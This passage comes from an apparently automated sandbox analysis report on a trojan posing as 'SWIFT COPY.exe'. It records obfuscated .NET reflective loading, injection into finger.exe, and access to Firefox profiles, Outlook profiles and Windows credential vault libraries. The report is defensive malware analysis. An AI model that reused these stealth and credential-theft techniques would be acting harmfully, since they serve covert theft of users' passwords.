                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0310DAC67_2_0310DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030F59107_2_030F5910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030699507_2_03069950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307B9507_2_0307B950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030CD8007_2_030CD800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030638E07_2_030638E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FF097_2_0311FF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03061F927_2_03061F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FFB17_2_0311FFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03023FD27_2_03023FD2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03023FD57_2_03023FD5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03069EB07_2_03069EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03063D407_2_03063D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03111D5A7_2_03111D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03117D737_2_03117D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307FDC07_2_0307FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D9C327_2_030D9C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FCF27_2_0311FCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02881ED07_2_02881ED0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287CFE07_2_0287CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287AFE87_2_0287AFE8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287AFF07_2_0287AFF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287CDC07_2_0287CDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287B1367_2_0287B136
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287B1407_2_0287B140
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_028837707_2_02883770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_028855607_2_02885560
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0289BC207_2_0289BC20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7E3987_2_02F7E398
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7E4B37_2_02F7E4B3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7CBAA7_2_02F7CBAA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7D8E37_2_02F7D8E3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7E84C7_2_02F7E84C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7D9187_2_02F7D918
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 030DF290 appears 103 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03095130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 030A7E54 appears 107 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 030CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0304B970 appears 262 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 0132B970 appears 262 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 013AEA12 appears 86 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 01387E54 appears 107 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 013BF290 appears 103 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 01375130 appears 58 times
                Source: SWIFT COPY.exe, 00000000.00000002.1883711010.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000000.00000002.1891135777.0000000007780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000000.00000000.1715349562.0000000000752000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZHWfc.exe4 vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000000.00000002.1893555495.000000000A090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000003.00000002.2224917606.000000000142D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SWIFT COPY.exe
                Source: SWIFT COPY.exeBinary or memory string: OriginalFilenameZHWfc.exe4 vs SWIFT COPY.exe
                Source: SWIFT COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SWIFT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, CkhZDfJRAqSUsrAlWc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@4/3
                Source: C:\Users\user\Desktop\SWIFT COPY.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SWIFT COPY.exe.log
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\finger.exe File created: C:\Users\user\AppData\Local\Temp\40F193-3PQ
                Source: SWIFT COPY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2406743191.0000000002A86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SWIFT COPY.exeVirustotal: Detection: 34%
                Source: SWIFT COPY.exeReversingLabs: Detection: 63%
                Source: unknown Process created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Process created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SWIFT COPY.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: SWIFT COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SWIFT COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XwGiOcrCkQ.exe, 00000006.00000002.3579093202.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293359567.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SWIFT COPY.exe, SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.cs.Net Code: nAh8jNlwVj System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SWIFT COPY.exe.43c5b98.1.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SWIFT COPY.exe.43a5b78.2.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1EBF pushad ; retf 0_2_04FB1EC6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43361 push 69C84589h; ret 0_2_09D43371
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43B6F push 69C84589h; ret 0_2_09D43B74
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D4333C push 69C84589h; ret 0_2_09D43343
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43AB5 push 69C84589h; ret 0_2_09D43ABA
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43D6E push 69D04589h; ret 0_2_09D43D75
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00416163 pusha ; iretd 3_2_004160B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00403110 push eax; ret 3_2_00403112
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040D1E1 push edx; retf 3_2_0040D1EB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0041427A push esp; ret 3_2_00414347
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00414222 push esp; ret 3_2_00414347
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040D2E0 push edi; retf 3_2_0040D2E4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0041435B push esp; ret 3_2_00414347
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00401D02 push ss; iretd 3_2_00401D04
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00418D36 push ds; iretd 3_2_00418D3C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00414587 push edi; ret 3_2_0041459C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00414593 push edi; ret 3_2_0041459C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00416626 push eax; ret 3_2_004166A4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00415ED3 pusha ; iretd 3_2_004160B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0041177F pushfd ; ret 3_2_00411786
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00423783 push edi; iretd 3_2_0042378E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0130225F pushad ; ret 3_2_013027F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013027FA pushad ; ret 3_2_013027F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013309AD push ecx; mov dword ptr [esp], ecx3_2_013309B6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0130283D push eax; iretd 3_2_01302858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0302225F pushad ; ret 7_2_030227F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030227FA pushad ; ret 7_2_030227F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030509AD push ecx; mov dword ptr [esp], ecx7_2_030509B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0302283D push eax; iretd 7_2_03022858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03021366 push eax; iretd 7_2_03021369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0289066A push edi; iretd 7_2_0289067B
                Source: SWIFT COPY.exeStatic PE information: section name: .text entropy: 7.67844699512359
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, pgOolZTETHev4y8l3L.csHigh entropy of concatenated method names: 'BL0WpxPWCr', 'YdEWMgaet4', 'MHxWJuqSf0', 'yq9WT3J9V7', 'mugWGNLI95', 'XpuWm30WUo', 'Ya0WrrZS9a', 'l18Wv0Np8g', 'i3qWVI1WNP', 'QjZWLdO7Db'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, ngHNgwPPjJV6Lt7hwqE.csHigh entropy of concatenated method names: 'dHOL0dqFtp', 'wI5LzflbHl', 'e5F7IUkfWr', 'FDW7PBn3Pa', 'Ixe71IBPpR', 'saE7tC9p5F', 'jgN78iquZi', 'dAK76e5Cf4', 'Hok7A3MKwS', 'V8V7KHLQ6K'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, JX1AgVop2XP58dnRsU.csHigh entropy of concatenated method names: 'FpjqkFOY44', 'mMgq2KgvVS', 'pksqjGFZBG', 'kuWqpuxCFl', 'hDYqQi4ysO', 'uvdqMJnTeE', 'n7BqhdUZ1l', 'NUQqJ0csLA', 'fKYqT4YFgY', 'nUcqddYrWu'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, GXDUQXSxvOdGW2xpWV.csHigh entropy of concatenated method names: 'v58qAC8jMW', 'yJCqW8RhtB', 'HWVqFgKsGk', 'dsxF0okuos', 'S2FFzCjrlQ', 'XQYqI7Ryyg', 'y0VqPp3cpY', 'ogKq1RYrDS', 'IIuqtPLmmm', 'k4Bq8U4Gyt'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, kevnhJKpftn38XCllX.csHigh entropy of concatenated method names: 'Dispose', 'e1tPXKOt48', 'FEa1fVPHJk', 'd7wtRRMqgr', 'w5nP0Gsl5q', 'oTgPz3useE', 'ProcessDialogKey', 'VE61IcxAhM', 'AK71PU6ey0', 'gYW11RPQcB'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, tdj7d88J2lr2blLl6y.csHigh entropy of concatenated method names: 'JLhPqkhZDf', 'RAqPNSUsrA', 'QETP4Hev4y', 'dl3PiLyUS1', 'RpKPGxFJmm', 'znCPml1ys8', 'uWxpuixyik2Z8h6moH', 'V3vKyBwb8uyVx6DdgY', 'D6WPPZ29jM', 'AjBPtMnvwc'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, SUS1Y7d06todxRpKxF.csHigh entropy of concatenated method names: 'n4RYQnAofO', 'SOWYh6MIdj', 'EOFWBJngle', 'nUwWD7HfWB', 'uGIWCdk1xm', 'zj4W3g07yt', 'eqZWSV3B2J', 'KAPWO77sS1', 'TVIWoPLcYu', 'QwaWgeY98R'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, fmQfxYH8J5TSNfKiWf.csHigh entropy of concatenated method names: 'LRHr4Txl41', 'UvdriJaETU', 'ToString', 'C37rAD6vXF', 'df8rKNK3du', 'txxrWHpk9m', 'LMLrY8d0iW', 'T9ArF6o3EW', 'vZCrqyMal0', 'y4SrNblDuN'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, ANnFHbfW0Do6vnXHF0.csHigh entropy of concatenated method names: 'Cp0GXJClKONR1pnlNcw', 'CItZpdC1DdVxeuIA0xl', 'z6yFvEF3SQ', 'hRKFVeiex5', 'WoLFLomen4', 'dgbXDsCRfUoultkHHBX', 'KfVSaJCtw9YEGlvvcgI'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, CkhZDfJRAqSUsrAlWc.csHigh entropy of concatenated method names: 'GiTKR1kmc1', 'd3tK5noqpj', 'MruKyaB0bg', 'lpTKHXw6oc', 'oUmKnFR7gI', 'jeEKs8rake', 'yUyKUqogDy', 'Wg3Kl0rOe9', 'nJAKXCvFj2', 'pMHK0Rv4ei'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, bTxYwBPIS41pIrFLa9k.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tU2LuqcTpn', 'BvLLwW2rbU', 'PF1LZMGJMs', 'nUNLRTLav1', 'EbML5amghQ', 'B7BLy9S9FT', 'kTuLH6W2g2'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, uVBRfg13TDMbJMd0Fp.csHigh entropy of concatenated method names: 'J9sjJvQvR', 'abap54fvr', 'wYlMVnCNb', 'K9ohPXmZ2', 'mwDTUf8nx', 'xC2dfEH5o', 'VeaT8sZQMpUel4qmBr', 'T6Sv1D2JsV5X4q6FAT', 'SRrvADwKh', 'jwfL5wlgE'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, rAtFfJzSo8Tf2AFjuv.csHigh entropy of concatenated method names: 'fUlLMujlNR', 'PCULJNJh0R', 'eVhLTJj8eR', 'mOsLcBmLPZ', 'A9fLfir67b', 'ghELDuLpJS', 'nBDLC6spf7', 'sWpLxKksHK', 'Cx2LkgJxWs', 'pF2L2sasFy'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csHigh entropy of concatenated method names: 'W36t6KgUgy', 'wuWtAd9gPW', 'VALtKmAEvx', 'lhFtW05bGf', 'GUttYGFA3S', 'htjtFKYjHb', 'xN7tqyUk31', 'hALtNsEgTf', 'iLKta9U8PU', 'j81t4NCrFY'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, DmmpnCcl1ys8cOY6PB.csHigh entropy of concatenated method names: 'YeCF6hjxX4', 'gmTFKjVSA9', 'lrsFYMtkr8', 'iZnFqj9C8c', 'xO5FNZDKIP', 'TpCYn7wQpH', 'ltjYsU12nF', 'f8LYUeAS9o', 'kWcYlMylLt', 'fCuYXTA4jD'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, LJ6VphyIn8SWBcejBx.csHigh entropy of concatenated method names: 'ToString', 'GvomuNipYL', 'g8qmfrDS1O', 'pp1mBpj3RC', 'DA2mDgxZb6', 'wpUmCQJmFW', 'b4Cm3HKEFW', 'bnOmS2mjZd', 'VrAmOcnfbQ', 'IAvmoayxvZ'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, PRVwXMUYh81tKOt48b.csHigh entropy of concatenated method names: 'g5IVGJ7MIZ', 'UKdVrUsb2B', 'NfRVVgUH8B', 'hKgV7niOp3', 'wALVEXWytf', 'kttVxpay4g', 'Dispose', 'g81vAsP1A3', 'wMkvKhW3N6', 'dclvWndEKi'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, ecxAhMXQK7U6ey0KYW.csHigh entropy of concatenated method names: 'xonVc0D3vd', 'ty7VfYSdDj', 'lJtVBqpYSw', 'qsqVDoaDnU', 'DPRVC4OCq3', 'yYYV3V19MG', 'X4iVSf0mpP', 'lb6VOog6NG', 'LSjVoGF7Cs', 'If4VgtB8Ep'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, RPQcBL0VyD2jnWdrsj.csHigh entropy of concatenated method names: 'HyLLWxyvFG', 'O8wLYSfcZy', 'vNpLFDjahn', 'eumLqCf8c8', 'lnlLV5eZdd', 'F4QLNwIKq8', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, zGpwFgRlKTSAnOF1F7.csHigh entropy of concatenated method names: 'nrrGgxNtPE', 'QiNGwqOorF', 'S15GRSoZZo', 'TBwG57GFpc', 'iuXGfFAifO', 'ljmGBrPosU', 'LpKGDoAT2n', 'G0VGCYux8t', 'C3lG30Ld4Y', 'Ix3GSbDGdo'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, cIHBcuZsAj7mNaqAYt.csHigh entropy of concatenated method names: 'PEG9J385JR', 'nox9TJ8W5B', 'dE79cF2iZB', 'KTR9fOWpDi', 'EWk9DvmOi6', 'GHm9Ciuivl', 'aAC9SoMWfr', 'He99O1mww9', 'AYP9g4LUFI', 'TbA9uDTfGY'
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\finger.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: SWIFT COPY.exe PID: 7404, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE22210154
